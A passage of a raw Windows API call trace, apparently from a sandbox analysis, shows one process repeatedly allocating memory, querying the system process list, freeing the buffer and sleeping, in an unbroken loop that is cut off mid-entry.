[0119.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.142] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.157] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.176] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.204] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.235] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.253] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.266] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.285] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.298] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.331] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.376] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.392] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.407] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.423] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.439] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.467] 